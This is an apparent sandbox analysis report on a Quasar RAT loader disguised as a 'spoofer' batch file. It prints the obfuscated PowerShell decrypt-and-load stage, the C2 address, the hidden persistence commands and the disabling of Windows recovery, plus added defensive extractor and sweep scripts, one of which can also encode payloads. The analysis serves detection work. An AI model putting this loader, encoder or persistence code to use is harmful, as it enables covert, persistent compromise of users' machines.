Analysis

  • max time kernel
    130s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/03/2025, 20:41

General

  • Target

    RedwareSpoofer.bat

  • Size

    504KB

  • MD5

    7e3035eb197a52820c5a33c064917a8e

  • SHA1

    147d70a538be4135dbd2ad4dbf2fd750a6d387ee

  • SHA256

    747b16e1c41f4e99be3b52a4dbd712cd4d5407f6afffdf5d20f61b2e4c4d63b6

  • SHA512

    f95b2c680d39bd529dac582aed23340b196bf85bb0bb2011261c8c3d59962d71e18e0d675bfd73c1e24675cc499e022cdc62b9daadd6b0f877ec97988ca8737c

  • SSDEEP

    12288:iuXbEUU3h+QHSyN1iWFTM1hK0gddk5uMmYmi0125gDv:iuXbjUR+IRiWFTMjKpkL7a2sv

Malware Config

Extracted

  • Family

    quasar

  • Version

    1.4.1

  • Botnet

    Office04

  • C2

    45.145.41.216:4782

  • Mutex

    14f7ea9d-a87f-45a9-861e-84025067723f

Attributes
  • encryption_key

    144B0EE0DD77F21360C6C78F9C3080B2B44AE54D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    System32

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open-source remote access tool (RAT) written in .NET.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell with its display window hidden.

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RedwareSpoofer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1176
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4172
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
        PID:4108
    • C:\Windows\system32\ReAgentc.exe
      reagentc.exe /disable
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      PID:4576
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zCWWg6vIbre+B0w3UuUd/NsHB3sHwnb8H8y/NYDt5PU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IKQYe9gd88vztHJcw6phFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kaqXF=New-Object System.IO.MemoryStream(,$param_var); $EQBuw=New-Object System.IO.MemoryStream; $sJMfi=New-Object System.IO.Compression.GZipStream($kaqXF, [IO.Compression.CompressionMode]::Decompress); $sJMfi.CopyTo($EQBuw); $sJMfi.Dispose(); $kaqXF.Dispose(); $EQBuw.Dispose(); $EQBuw.ToArray();}function execute_function($param_var,$param2_var){ $HYSQt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $gXvrb=$HYSQt.EntryPoint; $gXvrb.Invoke($null, $param2_var);}$latne = 'C:\Users\Admin\AppData\Local\Temp\RedwareSpoofer.bat';$host.UI.RawUI.WindowTitle = $latne;$czvVt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($latne).Split([Environment]::NewLine);foreach ($JBkBq in $czvVt) { if ($JBkBq.StartsWith('WwSYUPskWuZgnEierlVQ')) { $YJdtG=$JBkBq.Substring(20); break; }}$payloads_var=[string[]]$YJdtG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
      PID:2552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4412
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_439_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_439.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4648
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_439.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_439.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1012
          • C:\Windows\system32\net.exe
            net file
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3880
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 file
              6⤵
              PID:2408
          • C:\Windows\system32\ReAgentc.exe
            reagentc.exe /disable
            5⤵
            • Drops file in Windows directory
            PID:5044
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zCWWg6vIbre+B0w3UuUd/NsHB3sHwnb8H8y/NYDt5PU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IKQYe9gd88vztHJcw6phFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kaqXF=New-Object System.IO.MemoryStream(,$param_var); $EQBuw=New-Object System.IO.MemoryStream; $sJMfi=New-Object System.IO.Compression.GZipStream($kaqXF, [IO.Compression.CompressionMode]::Decompress); $sJMfi.CopyTo($EQBuw); $sJMfi.Dispose(); $kaqXF.Dispose(); $EQBuw.Dispose(); $EQBuw.ToArray();}function execute_function($param_var,$param2_var){ $HYSQt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $gXvrb=$HYSQt.EntryPoint; $gXvrb.Invoke($null, $param2_var);}$latne = 'C:\Users\Admin\AppData\Roaming\Windows_Log_439.bat';$host.UI.RawUI.WindowTitle = $latne;$czvVt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($latne).Split([Environment]::NewLine);foreach ($JBkBq in $czvVt) { if ($JBkBq.StartsWith('WwSYUPskWuZgnEierlVQ')) { $YJdtG=$JBkBq.Substring(20); break; }}$payloads_var=[string[]]$YJdtG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
            5⤵
            PID:2240
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2880
    • C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows_SettingsManager" /tr "\"C:\ProgramData\acwin_manager\windows_systemManager.vbs\"" /sc onlogon /rl highest /f
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4692
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "MicrosoftServiceManager" /t REG_SZ /d "wscript.exe \"C:\ProgramData\acwin_manager\windows_systemManager.vbs\"" /f
      2⤵
      • Adds Run key to start application
      PID:4468
    • C:\Windows\system32\attrib.exe
      attrib +s +h C:\ProgramData\acwin_manager
      2⤵
      • Sets file to hidden
      • Views/modifies file attributes
      PID:1704
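The two `cmd.exe /S /D /c" echo function decrypt_function…"` command lines above are the loader's whole second stage: the batch file pipes this script into `powershell.exe -w hidden`, which reads it from standard input. Method names are hidden by reversing strings at run time (`'gnirtS46esaBmorF'[-1..-16] -join ''` is `FromBase64String`, `'txeTllAdaeR'[-1..-11]` is `ReadAllText`, `'daoL'[-1..-4]` is `Load`). The script reads its own .bat (`$latne`), takes the line that begins with the 20-character marker `WwSYUPskWuZgnEierlVQ`, splits the remainder on `\`, and for each token undoes the `#`→`/` and `@`→`A` substitutions, base64-decodes, AES-256-CBC-decrypts with the hard-coded key and IV (PKCS7 padding), GZip-decompresses, and passes the result to `Assembly.Load`, invoking its entry point (the first payload with no arguments, the second with an empty `string[]`). Because the key and IV are embedded in the script, the payloads can be recovered without running anything. The PowerShell below is an added example, not the sample's code: it re-implements that decode chain, writes each payload to disk instead of loading it, and demonstrates itself on a constructed payload line built with the same key and IV. The stand-in payload bytes and the file paths are constructed for the demonstration and are not taken from the sample.

```powershell
# Added example (not the sample's code): static extractor for the .bat/PowerShell loader
# in this report. It reproduces the loader's decode chain offline and writes the payloads
# to disk instead of passing them to [Reflection.Assembly]::Load. The three constants are
# taken verbatim from the command line in the process tree.
$Marker = 'WwSYUPskWuZgnEierlVQ'                           # 20-char prefix of the payload line
$KeyB64 = 'zCWWg6vIbre+B0w3UuUd/NsHB3sHwnb8H8y/NYDt5PU='   # 32-byte key -> AES-256
$IvB64  = 'IKQYe9gd88vztHJcw6phFg=='                       # 16-byte IV

function New-LoaderAes {
    # Same cipher setup as decrypt_function in the sample, with the reversed-string
    # tricks replaced by the plain method names.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [Convert]::FromBase64String($KeyB64)
    $aes.IV      = [Convert]::FromBase64String($IvB64)
    return $aes
}

function ConvertFrom-LoaderToken {
    # One '\'-separated token -> raw payload bytes: undo the '#'/'@' substitutions,
    # base64-decode, AES-CBC-decrypt, GZip-decompress (the loader's order).
    param([Parameter(Mandatory)][string]$Token)
    $cipher = [Convert]::FromBase64String($Token.Replace('#', '/').Replace('@', 'A'))
    $aes = New-LoaderAes
    try     { $gz = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length) }
    finally { $aes.Dispose() }
    $in  = [System.IO.MemoryStream]::new($gz)
    $out = [System.IO.MemoryStream]::new()
    $gzs = [System.IO.Compression.GZipStream]::new($in, [System.IO.Compression.CompressionMode]::Decompress)
    $gzs.CopyTo($out); $gzs.Dispose(); $in.Dispose()
    $bytes = $out.ToArray(); $out.Dispose()
    return $bytes
}

function ConvertTo-LoaderToken {
    # Forward direction (GZip -> AES-CBC -> base64 -> '/'->'#', 'A'->'@'), used here only
    # to build a constructed input; the sample's builder is not on the page.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    $ms  = [System.IO.MemoryStream]::new()
    $gzs = [System.IO.Compression.GZipStream]::new($ms, [System.IO.Compression.CompressionMode]::Compress, $true)
    $gzs.Write($Bytes, 0, $Bytes.Length); $gzs.Dispose()
    $gz = $ms.ToArray(); $ms.Dispose()
    $aes = New-LoaderAes
    try     { $cipher = $aes.CreateEncryptor().TransformFinalBlock($gz, 0, $gz.Length) }
    finally { $aes.Dispose() }
    return [Convert]::ToBase64String($cipher).Replace('/', '#').Replace('A', '@')
}

function Export-LoaderPayload {
    # Locate the marker line in a .bat, decode every token and write payload_N.bin to
    # $OutDir. Nothing is executed; the MZ check only says whether it looks like a PE.
    param([Parameter(Mandatory)][string]$BatPath, [Parameter(Mandatory)][string]$OutDir)
    $line = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
    if (-not $line) { throw "no line starting with marker '$Marker' in $BatPath" }
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    $i = 0
    foreach ($token in $line.Substring($Marker.Length).Split('\')) {
        $bytes = ConvertFrom-LoaderToken -Token $token
        $dest  = Join-Path $OutDir "payload_${i}.bin"
        [System.IO.File]::WriteAllBytes($dest, $bytes)
        [pscustomobject]@{
            Path   = $dest
            Size   = $bytes.Length
            IsPE   = ($bytes.Length -ge 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
            SHA256 = (Get-FileHash -LiteralPath $dest -Algorithm SHA256).Hash
        }
        $i++
    }
}

# --- Constructed demonstration input: a fake loader line built with the real key/IV. ---
# The payload bytes are stand-ins (not the sample's assemblies); paths are arbitrary.
$p1  = [System.Text.Encoding]::ASCII.GetBytes('MZ stand-in for payload 1, would be a .NET assembly')
$p2  = [System.Text.Encoding]::ASCII.GetBytes('stand-in for payload 2, no MZ header')
$dir = Join-Path ([System.IO.Path]::GetTempPath()) 'constructed_loader'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$bat = Join-Path $dir 'constructed.bat'
$payloadLine = $Marker + ((ConvertTo-LoaderToken $p1), (ConvertTo-LoaderToken $p2) -join '\')
Set-Content -LiteralPath $bat -Encoding Ascii -Value @(
    '@echo off',
    'rem batch stub; the real sample pipes the PowerShell stage into powershell.exe -w hidden here',
    $payloadLine
)
Export-LoaderPayload -BatPath $bat -OutDir (Join-Path $dir 'out') | Format-Table -AutoSize
```

Against a real copy of RedwareSpoofer.bat (or Windows_Log_439.bat, which has the same hashes) only the `Export-LoaderPayload` call is needed; the recovered payload_0.bin and payload_1.bin are .NET assemblies that can be hashed, uploaded for a second opinion and opened in a .NET decompiler without ever being executed. Keep the output directory off any host that might run it, since Quasar's config extracted above shows the first-stage binaries are live.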

          Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            661739d384d9dfd807a089721202900b

            SHA1

            5b2c5d6a7122b4ce849dc98e79a7713038feac55

            SHA256

            70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

            SHA512

            81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            2KB

            MD5

            005bc2ef5a9d890fb2297be6a36f01c2

            SHA1

            0c52adee1316c54b0bfdc510c0963196e7ebb430

            SHA256

            342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

            SHA512

            f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yolr3zcu.axw.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\Windows_Log_439.bat

            Filesize

            504KB

            MD5

            7e3035eb197a52820c5a33c064917a8e

            SHA1

            147d70a538be4135dbd2ad4dbf2fd750a6d387ee

            SHA256

            747b16e1c41f4e99be3b52a4dbd712cd4d5407f6afffdf5d20f61b2e4c4d63b6

            SHA512

            f95b2c680d39bd529dac582aed23340b196bf85bb0bb2011261c8c3d59962d71e18e0d675bfd73c1e24675cc499e022cdc62b9daadd6b0f877ec97988ca8737c

          • C:\Users\Admin\AppData\Roaming\Windows_Log_439.vbs

            Filesize

            115B

            MD5

            731ab16030f423b66b128f17efdbfb73

            SHA1

            3b47e12575187b7d0ac7036bdf5e76490f98b952

            SHA256

            1723dd5e2e5a1614a235e174ba78fd6cf14f6c333b44f9a56c2b32e70a13704f

            SHA512

            4b83ace378f30212ad6415f5b61270853c20cd33c1317350377bfe9eaa2e3bd75e7dd49c4712a26d38317ac0dd544dc8252fa71768b21b24a82f1113188eed2f

          • C:\Windows\Logs\ReAgent\ReAgent.log

            Filesize

            2KB

            MD5

            3e84107e1dd4caa265c3d22b7f7e7fc9

            SHA1

            b92aceb1ee50be46fec28077288fd9247fc62ba1

            SHA256

            281cbd0231fe4de2932f3dd0bff4576d92b7a5d97070925d62d10b272d2f57ad

            SHA512

            092d03f3546d81adba43d702fd5b79bd3fadbcf8569fe49c3dd81d5b3de5bbf3c3b172a6af69da6f69a3c98ce51b6c1db666a7a65ac8e007b7ea1e0b4e4a2300

          • C:\Windows\Panther\UnattendGC\diagerr.xml

            Filesize

            11KB

            MD5

            8e193f4da80bb80060d23929482c3acf

            SHA1

            0d82b3479c78768c63815214a9f27ccc08f8480b

            SHA256

            44e6ac132e9a3198f9a7d1855aaa826628fcc3793492c9363cd3db7484f8496c

            SHA512

            33feb674b603258dc87c4313c81901d5b19824a133561a7ed52a2410c81aea48fe7ce4338563226dea2165ffce3ed7b3cc40ff3e8b819d6187d0acecfe2dc8be

          • C:\Windows\Panther\UnattendGC\diagwrn.xml

            Filesize

            13KB

            MD5

            2b59ad678f0fa47b4d46319e91b5be4e

            SHA1

            3f5f1a2ca5bbd635ad420a082bcb85fe60da9b78

            SHA256

            b4a7e152b8d2efe40c40ef9514059c0efed88a97c10d5e015a66c61f16c47f7b

            SHA512

            69ec72b25f49d736eb45a2841bb0f7fb8ea7ca03a121fa146597f0430069d32f972ba7cb1fcb6f374e0c2927963638b35cb300c169ec80e2a24d5d75a9ae9280

          • C:\Windows\system32\Recovery\ReAgent.xml

            Filesize

            1KB

            MD5

            44b2da39ceb2c183d5dcd43aa128c2dd

            SHA1

            502723d48caf7bb6e50867685378b28e84999d8a

            SHA256

            894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d

            SHA512

            17744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604

          • memory/2880-60-0x000001A9E0230000-0x000001A9E02E0000-memory.dmp

            Filesize

            704KB

          • memory/2880-67-0x000001A9E0FD0000-0x000001A9E1192000-memory.dmp

            Filesize

            1.8MB

          • memory/2880-66-0x000001A9E0D40000-0x000001A9E0DF2000-memory.dmp

            Filesize

            712KB

          • memory/2880-65-0x000001A9E0C30000-0x000001A9E0C80000-memory.dmp

            Filesize

            320KB

          • memory/4412-4-0x00007FFDE55C3000-0x00007FFDE55C5000-memory.dmp

            Filesize

            8KB

          • memory/4412-16-0x00007FFDE55C0000-0x00007FFDE6081000-memory.dmp

            Filesize

            10.8MB

          • memory/4412-21-0x00000239714C0000-0x0000023971516000-memory.dmp

            Filesize

            344KB

          • memory/4412-15-0x00007FFDE55C0000-0x00007FFDE6081000-memory.dmp

            Filesize

            10.8MB

          • memory/4412-5-0x000002396EDE0000-0x000002396EE02000-memory.dmp

            Filesize

            136KB

          • memory/4412-59-0x00007FFDE55C0000-0x00007FFDE6081000-memory.dmp

            Filesize

            10.8MB

          • memory/4412-17-0x0000023971370000-0x00000239713B4000-memory.dmp

            Filesize

            272KB

          • memory/4412-18-0x0000023971440000-0x00000239714B6000-memory.dmp

            Filesize

            472KB

          • memory/4412-19-0x000002396EE40000-0x000002396EE48000-memory.dmp

            Filesize

            32KB

          • memory/4412-20-0x00007FFDE55C0000-0x00007FFDE6081000-memory.dmp

            Filesize

            10.8MB
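Pulling the report's indicators together: the Quasar config gives a mutex, a C2 endpoint, a Run value name (`System32`, the startup_key) and an install target `SubDir\Client.exe`; the process tree adds the loader's own persistence (scheduled tasks `Windows_Log_439_str` and `Windows_SettingsManager`, Run value `MicrosoftServiceManager`, the `+s +h` folder C:\ProgramData\acwin_manager) and the `reagentc /disable` call that turns off Windows Recovery; and the Downloads list shows Windows_Log_439.bat in %APPDATA%\Roaming with the same SHA-256 as the submitted file, so it is a copy of the loader. The PowerShell below is an added example, not part of the Triage report or of Quasar's code: a read-only host sweep that checks for each of those artifacts and returns findings rather than changing anything. The extracted config does not say where Client.exe is installed, so checking `SubDir\Client.exe` under AppData, Program Files and System32 is an assumption about the builder's install-location options. Run it elevated so that HKLM and `reagentc /info` are readable; `Get-ScheduledTask` and `Get-NetTCPConnection` need Windows 8 / Server 2012 or later.

```powershell
# Added example, not part of the Triage report or of Quasar's code: a read-only host sweep
# for the indicators in this report. Values are taken from the extracted config and from the
# persistence commands in the process tree; the install-base list is an assumption (see below).
$Ioc = [ordered]@{
    C2Address     = '45.145.41.216'
    C2Port        = 4782
    Mutex         = '14f7ea9d-a87f-45a9-861e-84025067723f'
    InstallRel    = 'SubDir\Client.exe'                         # <subdirectory>\<install_name>
    RunValueNames = @('System32', 'MicrosoftServiceManager')   # config startup_key; loader's reg add
    TaskNames     = @('Windows_Log_439_str', 'Windows_SettingsManager')
    Paths         = @("$env:ProgramData\acwin_manager",
                      "$env:APPDATA\Windows_Log_439.vbs",
                      "$env:APPDATA\Windows_Log_439.bat")
}

function New-Finding {
    param([string]$Kind, [string]$Detail)
    [pscustomobject]@{ Kind = $Kind; Detail = $Detail }
}

function Test-NamedMutex {
    # True if a process in this session currently holds the mutex; the Quasar client
    # creates it at start so that a second copy exits.
    param([Parameter(Mandatory)][string]$Name)
    $m = $null
    if ([System.Threading.Mutex]::TryOpenExisting($Name, [ref]$m)) { $m.Dispose(); return $true }
    return $false
}

function Get-RunKeyFinding {
    param([string[]]$ValueNames)
    foreach ($hive in 'HKCU', 'HKLM') {
        $key = "${hive}:\Software\Microsoft\Windows\CurrentVersion\Run"
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($name in $ValueNames) {
            $p = $props.PSObject.Properties[$name]
            if ($p) { New-Finding 'RunKey' "$key\$name = $($p.Value)" }
        }
    }
}

function Get-ScheduledTaskFinding {
    param([string[]]$TaskNames)
    foreach ($name in $TaskNames) {
        $task = Get-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue
        if ($task) {
            $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
            New-Finding 'ScheduledTask' "$name -> $actions"
        }
    }
}

function Get-PathFinding {
    param([string[]]$Paths)
    foreach ($path in $Paths) {
        # -Force is needed because the loader sets +s +h on acwin_manager.
        $item = Get-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue
        if ($item) { New-Finding 'Path' "$path [$($item.Attributes)]" }
    }
}

function Get-InstallPathFinding {
    # Assumption: the extracted config does not include Quasar's install location, so
    # <subdirectory>\<install_name> is checked under the builder's selectable base folders.
    param([string]$Relative)
    $bases = @($env:APPDATA, $env:ProgramFiles, ${env:ProgramFiles(x86)}, "$env:SystemRoot\System32") | Where-Object { $_ }
    foreach ($base in $bases) {
        $full = Join-Path $base $Relative
        if (Test-Path -LiteralPath $full) { New-Finding 'InstallPath' $full }
    }
}

function Get-C2Finding {
    param([string]$Address, [int]$Port)
    Get-NetTCPConnection -RemoteAddress $Address -RemotePort $Port -ErrorAction SilentlyContinue |
        ForEach-Object { New-Finding 'C2Connection' "$($_.State) pid=$($_.OwningProcess) -> ${Address}:${Port}" }
}

function Get-WinREFinding {
    # reagentc /disable in the process tree switches off Windows RE; /info needs elevation.
    $info = & reagentc.exe /info 2>$null
    if ($info -match 'Windows RE status:\s*Disabled') { New-Finding 'WinRE' 'Windows RE is disabled' }
}

function Invoke-QuasarSweep {
    if (Test-NamedMutex $Ioc.Mutex) { New-Finding 'Mutex' $Ioc.Mutex }
    Get-RunKeyFinding $Ioc.RunValueNames
    Get-ScheduledTaskFinding $Ioc.TaskNames
    Get-PathFinding $Ioc.Paths
    Get-InstallPathFinding $Ioc.InstallRel
    Get-C2Finding $Ioc.C2Address $Ioc.C2Port
    Get-WinREFinding
}

$results = @(Invoke-QuasarSweep)
if ($results.Count -eq 0) { 'No indicators from this report found on this host.' }
else { $results | Format-Table -AutoSize }
```

A mutex hit and a C2 connection mean the RAT is running now; Run-key, task and path hits alone mean it is installed and will return at the next logon, so remove the tasks and Run values together with the files, and re-enable Windows RE with `reagentc /enable` once the host is clean. The string indicators (task names, folder, Run value) are specific to this build and will not carry over to other Quasar samples; the mutex and C2 are the config-level ones worth feeding into detection.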